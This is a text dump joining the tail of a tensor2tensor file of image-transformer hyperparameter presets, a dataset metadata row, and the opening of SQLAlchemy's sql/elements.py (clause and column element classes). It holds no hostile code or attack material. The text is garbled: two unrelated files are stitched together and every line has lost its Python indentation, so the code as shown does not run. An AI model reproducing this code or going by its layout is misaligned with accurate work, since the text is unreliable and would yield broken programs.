def imagetransformer_sep_channels_8l_8h():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.num_heads = 8
hparams.batch_size = 1
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 512
hparams.filter_size = 512
hparams.num_hidden_layers = 8
hparams.sampling_method = "random"
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l_8h_local_and_global_att():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l_8h()
hparams.num_heads = 8
hparams.batch_size = 1
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 256
hparams.filter_size = 256
hparams.num_hidden_layers = 4
hparams.sampling_method = "random"
hparams.local_and_global_att = True
return hparams
@registry.register_hparams
def imagetransformer_bas8l_8h_big_uncond_dr03_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big_dr01()
# num_hidden_layers
hparams.num_decoder_layers = 8
hparams.num_heads = 8
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_tiny():
hparams = imagetransformer_base()
hparams.num_decoder_layers = 2
hparams.hidden_size = 64
hparams.batch_size = 1
hparams.unconditional = True
hparams.max_length = 66000 # allow for 256x256
return hparams
@registry.register_hparams
def imagetransformerpp_tiny():
hparams = imagetransformer_tiny()
hparams.likelihood = cia.DistributionType.DMOL
hparams.num_channels = 1
hparams.bottom["targets"] = modalities.image_channel_compress_targets_bottom
hparams.top["targets"] = modalities.identity_top
return hparams
@registry.register_hparams
def imagetransformer_tiny_tpu():
hparams = imagetransformer_tiny()
update_hparams_for_tpu(hparams)
hparams.num_hidden_layers = 2
hparams.hidden_size = 16
hparams.batch_size = 2
hparams.num_heads = 2
return hparams
@registry.register_hparams
def imagetransformer_base_10l_16h_big_dr01_moe_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_10l_16h_big_dr01_imgnet()
hparams.initializer = "orthogonal"
hparams.learning_rate_warmup_steps = 16000
hparams.add_hparam("moe_layers_decoder", "2,7") # Which layer is MoE.
hparams.moe_hidden_sizes = "4096" # Hidden layer sizes (comma-separated).
hparams.moe_num_experts = 64 # Number of experts in each MoE layer.
hparams.moe_k = 4 # How many experts to use per batch element (try 2 or 4).
hparams.moe_loss_coef = 3e-2 # MoE loss coefficient (1e-2 is usually ok).
hparams.scheduled_sampling_prob = 0.1
hparams.scheduled_sampling_warmup_steps = 200000
return hparams
@registry.register_hparams
def imagetransformer_moe_tiny():
"""Set of hyperparameters for a very small imagetransformer with MoE."""
hparams = imagetransformer_tiny()
hparams.hidden_size = 64
hparams.batch_size = 1
hparams.num_hidden_layers = 3
hparams.dec_attention_type = cia.AttentionType.MOE_LOCAL_1D
hparams.add_hparam("moe_layers_decoder", "1") # Which layer is MoE.
hparams.moe_hidden_sizes = "1024" # Hidden layer sizes (comma-separated).
hparams.moe_num_experts = 16 # Number of experts in each MoE layer.
hparams.moe_k = 2 # How many experts to use per batch element (try 2 or 4).
hparams.moe_loss_coef = 1e-2 # MoE loss coefficient (1e-2 is usually ok).
return hparams
def update_hparams_for_tpu(hparams):
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
hparams.learning_rate_warmup_steps = 6000
hparams.batch_size = 4
@registry.register_hparams
def imagetransformer_sep_channels_8l_tpu():
"""Hparams for training imagetransformer on tpu."""
hparams = imagetransformer_sep_channels_8l()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.shared_embedding_and_softmax_weights = False
return hparams
@registry.register_hparams
def imagetransformer_b10l_4h_big_uncond_dr03_tpu():
"""Small model for tpu cifar 10."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 10
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 1024
hparams.learning_rate = 0.2
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
return hparams
@registry.register_hparams
def imagetransformer_b10l_dr03_moe_tpu():
"""Moe tpu params."""
hparams = imagetransformer_b10l_4h_big_uncond_dr03_tpu()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 10
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.ffn_layer = "local_moe_tpu"
return hparams
@registry.register_hparams
def imagetransformer_b10l_4h_big_uncond_dr03_lr025_tpu():
"""TPU related small model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 10
hparams.learning_rate = 0.25
hparams.learning_rate_warmup_steps = 8000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
# hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_big_uncond_dr03_tpu():
"""TPU 12 layer model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 1024
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_big_uncond_dr03_lr025_tpu():
hparams = imagetransformer_b12l_4h_big_uncond_dr03_tpu()
update_hparams_for_tpu(hparams)
hparams.learning_rate = 0.25
hparams.learning_rate_warmup_steps = 5000
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b256_uncond_dr03_tpu():
"""works very well on 4x4."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 256
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.5
hparams.learning_rate_warmup_steps = 4000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b256_uncond_dr03_rel_tpu():
"""works very well on 4x4."""
hparams = imagetransformer_b12l_4h_b256_uncond_dr03_tpu()
hparams.shared_rel = True
hparams.dec_attention_type = cia.AttentionType.RELATIVE_LOCAL_1D
return hparams
@registry.register_ranged_hparams
def imagetransformer_cifar_tpu_range(rhp):
"""Range of hyperparameters for vizier."""
# After starting from base, set intervals for some parameters.
rhp.set_float("learning_rate", 0.01, 1.0, scale=rhp.LOG_SCALE)
rhp.set_discrete("num_decoder_layers", [8, 10, 12, 14, 16])
rhp.set_discrete("hidden_size", [256, 512, 1024])
rhp.set_discrete("block_length", [128, 256, 512])
rhp.set_categorical("dec_attention_type", [
cia.AttentionType.RELATIVE_LOCAL_1D, cia.AttentionType.LOCAL_1D])
@registry.register_hparams
def imagetransformer_b12l_4h_b128_h512_uncond_dr03_tpu():
"""TPU related big model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.2
hparams.learning_rate_warmup_steps = 6000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b128_h512_uncond_dr01_im():
"""TPU related imagenet model."""
hparams = imagetransformer_b12l_4h_b256_uncond_dr03_tpu()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
hparams.learning_rate_warmup_steps = 6000
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_uncond_dr03_tpu():
"""TPU related small model."""
hparams = imagetransformer_b12l_4h_b256_uncond_dr03_tpu()
hparams.learning_rate = 0.2
hparams.learning_rate_warmup_steps = 4000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b128_uncond_dr03_tpu():
"""TPU config for cifar 10."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 2
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 256
hparams.filter_size = 2048
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.1
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
hparams.learning_rate_warmup_steps = 10000
return hparams
@registry.register_hparams
def imagetransformer_b12l_8h_b256_uncond_dr03_tpu():
"""TPU related 12 layer 8 heads model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 2
hparams.num_heads = 8 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 256
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b10l_4h_big_uncond_dr01_tpu():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_b12l_4h_big_uncond_dr03_tpu()
# num_hidden_layers
hparams.num_decoder_layers = 10
hparams.num_heads = 4
hparams.hidden_size = 1024
hparams.filter_size = 4096
hparams.batch_size = 1
hparams.layer_prepostprocess_dropout = 0.1
return hparams
|
tensorflow/tensor2tensor
|
tensor2tensor/models/image_transformer.py
|
Python
|
apache-2.0
| 37,900
|
[
"MOE"
] |
c9323106c139c8795ba1b62238723814620de0f95db3c44edf20467f9ac1affb
|
# sql/elements.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Core SQL expression elements, including :class:`.ClauseElement`,
:class:`.ColumnElement`, and derived classes.
"""
from __future__ import unicode_literals
from .. import util, exc, inspection
from . import type_api
from . import operators
from .visitors import Visitable, cloned_traverse, traverse
from .annotation import Annotated
import itertools
from .base import Executable, PARSE_AUTOCOMMIT, Immutable, NO_ARG
from .base import _generative
import numbers
import re
import operator
def _clone(element, **kw):
return element._clone()
def collate(expression, collation):
"""Return the clause ``expression COLLATE collation``.
e.g.::
collate(mycolumn, 'utf8_bin')
produces::
mycolumn COLLATE utf8_bin
"""
expr = _literal_as_binds(expression)
return BinaryExpression(
expr,
_literal_as_text(collation),
operators.collate, type_=expr.type)
def between(expr, lower_bound, upper_bound, symmetric=False):
"""Produce a ``BETWEEN`` predicate clause.
E.g.::
from sqlalchemy import between
stmt = select([users_table]).where(between(users_table.c.id, 5, 7))
Would produce SQL resembling::
SELECT id, name FROM user WHERE id BETWEEN :id_1 AND :id_2
The :func:`.between` function is a standalone version of the
:meth:`.ColumnElement.between` method available on all
SQL expressions, as in::
stmt = select([users_table]).where(users_table.c.id.between(5, 7))
All arguments passed to :func:`.between`, including the left side
column expression, are coerced from Python scalar values if a
the value is not a :class:`.ColumnElement` subclass. For example,
three fixed values can be compared as in::
print(between(5, 3, 7))
Which would produce::
:param_1 BETWEEN :param_2 AND :param_3
:param expr: a column expression, typically a :class:`.ColumnElement`
instance or alternatively a Python scalar expression to be coerced
into a column expression, serving as the left side of the ``BETWEEN``
expression.
:param lower_bound: a column or Python scalar expression serving as the
lower bound of the right side of the ``BETWEEN`` expression.
:param upper_bound: a column or Python scalar expression serving as the
upper bound of the right side of the ``BETWEEN`` expression.
:param symmetric: if True, will render " BETWEEN SYMMETRIC ". Note
that not all databases support this syntax.
.. versionadded:: 0.9.5
.. seealso::
:meth:`.ColumnElement.between`
"""
expr = _literal_as_binds(expr)
return expr.between(lower_bound, upper_bound, symmetric=symmetric)
def literal(value, type_=None):
"""Return a literal clause, bound to a bind parameter.
Literal clauses are created automatically when non-
:class:`.ClauseElement` objects (such as strings, ints, dates, etc.) are
used in a comparison operation with a :class:`.ColumnElement` subclass,
such as a :class:`~sqlalchemy.schema.Column` object. Use this function
to force the generation of a literal clause, which will be created as a
:class:`BindParameter` with a bound value.
:param value: the value to be bound. Can be any Python object supported by
the underlying DB-API, or is translatable via the given type argument.
:param type\_: an optional :class:`~sqlalchemy.types.TypeEngine` which
will provide bind-parameter translation for this literal.
"""
return BindParameter(None, value, type_=type_, unique=True)
def type_coerce(expression, type_):
"""Associate a SQL expression with a particular type, without rendering
``CAST``.
E.g.::
from sqlalchemy import type_coerce
stmt = select([type_coerce(log_table.date_string, StringDateTime())])
The above construct will produce SQL that is usually otherwise unaffected
by the :func:`.type_coerce` call::
SELECT date_string FROM log
However, when result rows are fetched, the ``StringDateTime`` type
will be applied to result rows on behalf of the ``date_string`` column.
A type that features bound-value handling will also have that behavior
take effect when literal values or :func:`.bindparam` constructs are
passed to :func:`.type_coerce` as targets.
For example, if a type implements the :meth:`.TypeEngine.bind_expression`
method or :meth:`.TypeEngine.bind_processor` method or equivalent,
these functions will take effect at statement compilation/execution time
when a literal value is passed, as in::
# bound-value handling of MyStringType will be applied to the
# literal value "some string"
stmt = select([type_coerce("some string", MyStringType)])
:func:`.type_coerce` is similar to the :func:`.cast` function,
except that it does not render the ``CAST`` expression in the resulting
statement.
:param expression: A SQL expression, such as a :class:`.ColumnElement`
expression or a Python string which will be coerced into a bound literal
value.
:param type_: A :class:`.TypeEngine` class or instance indicating
the type to which the expression is coerced.
.. seealso::
:func:`.cast`
"""
type_ = type_api.to_instance(type_)
if hasattr(expression, '__clause_element__'):
return type_coerce(expression.__clause_element__(), type_)
elif isinstance(expression, BindParameter):
bp = expression._clone()
bp.type = type_
return bp
elif not isinstance(expression, Visitable):
if expression is None:
return Null()
else:
return literal(expression, type_=type_)
else:
return Label(None, expression, type_=type_)
def outparam(key, type_=None):
"""Create an 'OUT' parameter for usage in functions (stored procedures),
for databases which support them.
The ``outparam`` can be used like a regular function parameter.
The "output" value will be available from the
:class:`~sqlalchemy.engine.ResultProxy` object via its ``out_parameters``
attribute, which returns a dictionary containing the values.
"""
return BindParameter(
key, None, type_=type_, unique=False, isoutparam=True)
def not_(clause):
"""Return a negation of the given clause, i.e. ``NOT(clause)``.
The ``~`` operator is also overloaded on all
:class:`.ColumnElement` subclasses to produce the
same result.
"""
return operators.inv(_literal_as_binds(clause))
@inspection._self_inspects
class ClauseElement(Visitable):
"""Base class for elements of a programmatically constructed SQL
expression.
"""
__visit_name__ = 'clause'
_annotations = {}
supports_execution = False
_from_objects = []
bind = None
_is_clone_of = None
is_selectable = False
is_clause_element = True
description = None
_order_by_label_element = None
_is_from_container = False
def _clone(self):
"""Create a shallow copy of this ClauseElement.
This method may be used by a generative API. Its also used as
part of the "deep" copy afforded by a traversal that combines
the _copy_internals() method.
"""
c = self.__class__.__new__(self.__class__)
c.__dict__ = self.__dict__.copy()
ClauseElement._cloned_set._reset(c)
ColumnElement.comparator._reset(c)
# this is a marker that helps to "equate" clauses to each other
# when a Select returns its list of FROM clauses. the cloning
# process leaves around a lot of remnants of the previous clause
# typically in the form of column expressions still attached to the
# old table.
c._is_clone_of = self
return c
@property
def _constructor(self):
"""return the 'constructor' for this ClauseElement.
This is for the purposes for creating a new object of
this type. Usually, its just the element's __class__.
However, the "Annotated" version of the object overrides
to return the class of its proxied element.
"""
return self.__class__
@util.memoized_property
def _cloned_set(self):
"""Return the set consisting all cloned ancestors of this
ClauseElement.
Includes this ClauseElement. This accessor tends to be used for
FromClause objects to identify 'equivalent' FROM clauses, regardless
of transformative operations.
"""
s = util.column_set()
f = self
while f is not None:
s.add(f)
f = f._is_clone_of
return s
def __getstate__(self):
d = self.__dict__.copy()
d.pop('_is_clone_of', None)
return d
def _annotate(self, values):
"""return a copy of this ClauseElement with annotations
updated by the given dictionary.
"""
return Annotated(self, values)
def _with_annotations(self, values):
"""return a copy of this ClauseElement with annotations
replaced by the given dictionary.
"""
return Annotated(self, values)
def _deannotate(self, values=None, clone=False):
"""return a copy of this :class:`.ClauseElement` with annotations
removed.
:param values: optional tuple of individual values
to remove.
"""
if clone:
# clone is used when we are also copying
# the expression for a deep deannotation
return self._clone()
else:
# if no clone, since we have no annotations we return
# self
return self
def _execute_on_connection(self, connection, multiparams, params):
return connection._execute_clauseelement(self, multiparams, params)
def unique_params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elements replaced.
Same functionality as ``params()``, except adds `unique=True`
to affected bind parameters so that multiple statements can be
used.
"""
return self._params(True, optionaldict, kwargs)
def params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elements replaced.
Returns a copy of this ClauseElement with :func:`bindparam()`
elements replaced with values taken from the given dictionary::
>>> clause = column('x') + bindparam('foo')
>>> print clause.compile().params
{'foo':None}
>>> print clause.params({'foo':7}).compile().params
{'foo':7}
"""
return self._params(False, optionaldict, kwargs)
def _params(self, unique, optionaldict, kwargs):
if len(optionaldict) == 1:
kwargs.update(optionaldict[0])
elif len(optionaldict) > 1:
raise exc.ArgumentError(
"params() takes zero or one positional dictionary argument")
def visit_bindparam(bind):
if bind.key in kwargs:
bind.value = kwargs[bind.key]
bind.required = False
if unique:
bind._convert_to_unique()
return cloned_traverse(self, {}, {'bindparam': visit_bindparam})
def compare(self, other, **kw):
"""Compare this ClauseElement to the given ClauseElement.
Subclasses should override the default behavior, which is a
straight identity comparison.
\**kw are arguments consumed by subclass compare() methods and
may be used to modify the criteria for comparison.
(see :class:`.ColumnElement`)
"""
return self is other
def _copy_internals(self, clone=_clone, **kw):
"""Reassign internal elements to be clones of themselves.
Called during a copy-and-traverse operation on newly
shallow-copied elements to create a deep copy.
The given clone function should be used, which may be applying
additional transformations to the element (i.e. replacement
traversal, cloned traversal, annotations).
"""
pass
def get_children(self, **kwargs):
"""Return immediate child elements of this :class:`.ClauseElement`.
This is used for visit traversal.
\**kwargs may contain flags that change the collection that is
returned, for example to return a subset of items in order to
cut down on larger traversals, or to return child items from a
different context (such as schema-level collections instead of
clause-level).
"""
return []
def self_group(self, against=None):
"""Apply a 'grouping' to this :class:`.ClauseElement`.
This method is overridden by subclasses to return a
"grouping" construct, i.e. parenthesis. In particular
it's used by "binary" expressions to provide a grouping
around themselves when placed into a larger expression,
as well as by :func:`.select` constructs when placed into
the FROM clause of another :func:`.select`. (Note that
subqueries should be normally created using the
:meth:`.Select.alias` method, as many platforms require
nested SELECT statements to be named).
As expressions are composed together, the application of
:meth:`self_group` is automatic - end-user code should never
need to use this method directly. Note that SQLAlchemy's
clause constructs take operator precedence into account -
so parenthesis might not be needed, for example, in
an expression like ``x OR (y AND z)`` - AND takes precedence
over OR.
The base :meth:`self_group` method of :class:`.ClauseElement`
just returns self.
"""
return self
@util.dependencies("sqlalchemy.engine.default")
def compile(self, default, bind=None, dialect=None, **kw):
"""Compile this SQL expression.
The return value is a :class:`~.Compiled` object.
Calling ``str()`` or ``unicode()`` on the returned value will yield a
string representation of the result. The
:class:`~.Compiled` object also can return a
dictionary of bind parameter names and values
using the ``params`` accessor.
:param bind: An ``Engine`` or ``Connection`` from which a
``Compiled`` will be acquired. This argument takes precedence over
this :class:`.ClauseElement`'s bound engine, if any.
:param column_keys: Used for INSERT and UPDATE statements, a list of
column names which should be present in the VALUES clause of the
compiled statement. If ``None``, all columns from the target table
object are rendered.
:param dialect: A ``Dialect`` instance from which a ``Compiled``
will be acquired. This argument takes precedence over the `bind`
argument as well as this :class:`.ClauseElement`'s bound engine,
if any.
:param inline: Used for INSERT statements, for a dialect which does
not support inline retrieval of newly generated primary key
columns, will force the expression used to create the new primary
key value to be rendered inline within the INSERT statement's
VALUES clause. This typically refers to Sequence execution but may
also refer to any server-side default generation function
associated with a primary key `Column`.
:param compile_kwargs: optional dictionary of additional parameters
that will be passed through to the compiler within all "visit"
methods. This allows any custom flag to be passed through to
a custom compilation construct, for example. It is also used
for the case of passing the ``literal_binds`` flag through::
from sqlalchemy.sql import table, column, select
t = table('t', column('x'))
s = select([t]).where(t.c.x == 5)
print s.compile(compile_kwargs={"literal_binds": True})
.. versionadded:: 0.9.0
.. seealso::
:ref:`faq_sql_expression_string`
"""
if not dialect:
if bind:
dialect = bind.dialect
elif self.bind:
dialect = self.bind.dialect
bind = self.bind
else:
dialect = default.DefaultDialect()
return self._compiler(dialect, bind=bind, **kw)
def _compiler(self, dialect, **kw):
"""Return a compiler appropriate for this ClauseElement, given a
Dialect."""
return dialect.statement_compiler(dialect, self, **kw)
def __str__(self):
if util.py3k:
return str(self.compile())
else:
return unicode(self.compile()).encode('ascii', 'backslashreplace')
def __and__(self, other):
"""'and' at the ClauseElement level.
.. deprecated:: 0.9.5 - conjunctions are intended to be
at the :class:`.ColumnElement`. level
"""
return and_(self, other)
def __or__(self, other):
"""'or' at the ClauseElement level.
.. deprecated:: 0.9.5 - conjunctions are intended to be
at the :class:`.ColumnElement`. level
"""
return or_(self, other)
def __invert__(self):
if hasattr(self, 'negation_clause'):
return self.negation_clause
else:
return self._negate()
def _negate(self):
return UnaryExpression(
self.self_group(against=operators.inv),
operator=operators.inv,
negate=None)
def __bool__(self):
raise TypeError("Boolean value of this clause is not defined")
__nonzero__ = __bool__
def __repr__(self):
friendly = self.description
if friendly is None:
return object.__repr__(self)
else:
return '<%s.%s at 0x%x; %s>' % (
self.__module__, self.__class__.__name__, id(self), friendly)
class ColumnElement(operators.ColumnOperators, ClauseElement):
"""Represent a column-oriented SQL expression suitable for usage in the
"columns" clause, WHERE clause etc. of a statement.
While the most familiar kind of :class:`.ColumnElement` is the
:class:`.Column` object, :class:`.ColumnElement` serves as the basis
for any unit that may be present in a SQL expression, including
the expressions themselves, SQL functions, bound parameters,
literal expressions, keywords such as ``NULL``, etc.
:class:`.ColumnElement` is the ultimate base class for all such elements.
A wide variety of SQLAlchemy Core functions work at the SQL expression
level, and are intended to accept instances of :class:`.ColumnElement` as
arguments. These functions will typically document that they accept a
"SQL expression" as an argument. What this means in terms of SQLAlchemy
usually refers to an input which is either already in the form of a
:class:`.ColumnElement` object, or a value which can be **coerced** into
one. The coercion rules followed by most, but not all, SQLAlchemy Core
functions with regards to SQL expressions are as follows:
* a literal Python value, such as a string, integer or floating
point value, boolean, datetime, ``Decimal`` object, or virtually
any other Python object, will be coerced into a "literal bound
value". This generally means that a :func:`.bindparam` will be
produced featuring the given value embedded into the construct; the
resulting :class:`.BindParameter` object is an instance of
:class:`.ColumnElement`. The Python value will ultimately be sent
to the DBAPI at execution time as a paramterized argument to the
``execute()`` or ``executemany()`` methods, after SQLAlchemy
type-specific converters (e.g. those provided by any associated
:class:`.TypeEngine` objects) are applied to the value.
* any special object value, typically ORM-level constructs, which
feature a method called ``__clause_element__()``. The Core
expression system looks for this method when an object of otherwise
unknown type is passed to a function that is looking to coerce the
argument into a :class:`.ColumnElement` expression. The
``__clause_element__()`` method, if present, should return a
:class:`.ColumnElement` instance. The primary use of
``__clause_element__()`` within SQLAlchemy is that of class-bound
attributes on ORM-mapped classes; a ``User`` class which contains a
mapped attribute named ``.name`` will have a method
``User.name.__clause_element__()`` which when invoked returns the
:class:`.Column` called ``name`` associated with the mapped table.
* The Python ``None`` value is typically interpreted as ``NULL``,
which in SQLAlchemy Core produces an instance of :func:`.null`.
A :class:`.ColumnElement` provides the ability to generate new
:class:`.ColumnElement`
objects using Python expressions. This means that Python operators
such as ``==``, ``!=`` and ``<`` are overloaded to mimic SQL operations,
and allow the instantiation of further :class:`.ColumnElement` instances
which are composed from other, more fundamental :class:`.ColumnElement`
objects. For example, two :class:`.ColumnClause` objects can be added
together with the addition operator ``+`` to produce
a :class:`.BinaryExpression`.
Both :class:`.ColumnClause` and :class:`.BinaryExpression` are subclasses
of :class:`.ColumnElement`::
>>> from sqlalchemy.sql import column
>>> column('a') + column('b')
<sqlalchemy.sql.expression.BinaryExpression object at 0x101029dd0>
>>> print column('a') + column('b')
a + b
.. seealso::
:class:`.Column`
:func:`.expression.column`
"""
__visit_name__ = 'column'
primary_key = False
foreign_keys = []
_label = None
"""The named label that can be used to target
this column in a result set.
This label is almost always the label used when
rendering <expr> AS <label> in a SELECT statement. It also
refers to a name that this column expression can be located from
in a result set.
For a regular Column bound to a Table, this is typically the label
<tablename>_<columnname>. For other constructs, different rules
may apply, such as anonymized labels and others.
"""
key = None
"""the 'key' that in some circumstances refers to this object in a
Python namespace.
This typically refers to the "key" of the column as present in the
``.c`` collection of a selectable, e.g. sometable.c["somekey"] would
return a Column with a .key of "somekey".
"""
_key_label = None
"""A label-based version of 'key' that in some circumstances refers
to this object in a Python namespace.
_key_label comes into play when a select() statement is constructed with
apply_labels(); in this case, all Column objects in the ``.c`` collection
are rendered as <tablename>_<columnname> in SQL; this is essentially the
value of ._label. But to locate those columns in the ``.c`` collection,
the name is along the lines of <tablename>_<key>; that's the typical
value of .key_label.
"""
_render_label_in_columns_clause = True
"""A flag used by select._columns_plus_names that helps to determine
we are actually going to render in terms of "SELECT <col> AS <label>".
This flag can be returned as False for some Column objects that want
to be rendered as simple "SELECT <col>"; typically columns that don't have
any parent table and are named the same as what the label would be
in any case.
"""
_resolve_label = None
"""The name that should be used to identify this ColumnElement in a
select() object when "label resolution" logic is used; this refers
to using a string name in an expression like order_by() or group_by()
that wishes to target a labeled expression in the columns clause.
The name is distinct from that of .name or ._label to account for the case
where anonymizing logic may be used to change the name that's actually
rendered at compile time; this attribute should hold onto the original
name that was user-assigned when producing a .label() construct.
"""
_allow_label_resolve = True
"""A flag that can be flipped to prevent a column from being resolvable
by string label name."""
_alt_names = ()
def self_group(self, against=None):
if (against in (operators.and_, operators.or_, operators._asbool) and
self.type._type_affinity
is type_api.BOOLEANTYPE._type_affinity):
return AsBoolean(self, operators.istrue, operators.isfalse)
else:
return self
def _negate(self):
if self.type._type_affinity is type_api.BOOLEANTYPE._type_affinity:
return AsBoolean(self, operators.isfalse, operators.istrue)
else:
return super(ColumnElement, self)._negate()
@util.memoized_property
def type(self):
return type_api.NULLTYPE
@util.memoized_property
def comparator(self):
try:
comparator_factory = self.type.comparator_factory
except AttributeError:
raise TypeError(
"Object %r associated with '.type' attribute "
"is not a TypeEngine class or object" % self.type)
else:
return comparator_factory(self)
def __getattr__(self, key):
try:
return getattr(self.comparator, key)
except AttributeError:
raise AttributeError(
'Neither %r object nor %r object has an attribute %r' % (
type(self).__name__,
type(self.comparator).__name__,
key)
)
def operate(self, op, *other, **kwargs):
return op(self.comparator, *other, **kwargs)
def reverse_operate(self, op, other, **kwargs):
return op(other, self.comparator, **kwargs)
def _bind_param(self, operator, obj):
return BindParameter(None, obj,
_compared_to_operator=operator,
_compared_to_type=self.type, unique=True)
@property
def expression(self):
"""Return a column expression.
Part of the inspection interface; returns self.
"""
return self
@property
def _select_iterable(self):
return (self, )
@util.memoized_property
def base_columns(self):
return util.column_set(c for c in self.proxy_set
if not hasattr(c, '_proxies'))
@util.memoized_property
def proxy_set(self):
s = util.column_set([self])
if hasattr(self, '_proxies'):
for c in self._proxies:
s.update(c.proxy_set)
return s
def shares_lineage(self, othercolumn):
"""Return True if the given :class:`.ColumnElement`
has a common ancestor to this :class:`.ColumnElement`."""
return bool(self.proxy_set.intersection(othercolumn.proxy_set))
def _compare_name_for_result(self, other):
"""Return True if the given column element compares to this one
when targeting within a result row."""
return hasattr(other, 'name') and hasattr(self, 'name') and \
other.name == self.name
def _make_proxy(
self, selectable, name=None, name_is_truncatable=False, **kw):
"""Create a new :class:`.ColumnElement` representing this
:class:`.ColumnElement` as it appears in the select list of a
descending selectable.
"""
if name is None:
name = self.anon_label
if self.key:
key = self.key
else:
try:
key = str(self)
except exc.UnsupportedCompilationError:
key = self.anon_label
else:
key = name
co = ColumnClause(
_as_truncated(name) if name_is_truncatable else name,
type_=getattr(self, 'type', None),
_selectable=selectable
)
co._proxies = [self]
if selectable._is_clone_of is not None:
co._is_clone_of = \
selectable._is_clone_of.columns.get(key)
selectable._columns[key] = co
return co
def compare(self, other, use_proxies=False, equivalents=None, **kw):
"""Compare this ColumnElement to another.
Special arguments understood:
:param use_proxies: when True, consider two columns that
share a common base column as equivalent (i.e. shares_lineage())
:param equivalents: a dictionary of columns as keys mapped to sets
of columns. If the given "other" column is present in this
dictionary, if any of the columns in the corresponding set() pass
the comparison test, the result is True. This is used to expand the
comparison to other columns that may be known to be equivalent to
this one via foreign key or other criterion.
"""
to_compare = (other, )
if equivalents and other in equivalents:
to_compare = equivalents[other].union(to_compare)
for oth in to_compare:
if use_proxies and self.shares_lineage(oth):
return True
elif hash(oth) == hash(self):
return True
else:
return False
def cast(self, type_):
"""Produce a type cast, i.e. ``CAST(<expression> AS <type>)``.
This is a shortcut to the :func:`~.expression.cast` function.
.. versionadded:: 1.0.7
"""
return Cast(self, type_)
def label(self, name):
"""Produce a column label, i.e. ``<columnname> AS <name>``.
This is a shortcut to the :func:`~.expression.label` function.
if 'name' is None, an anonymous label name will be generated.
"""
return Label(name, self, self.type)
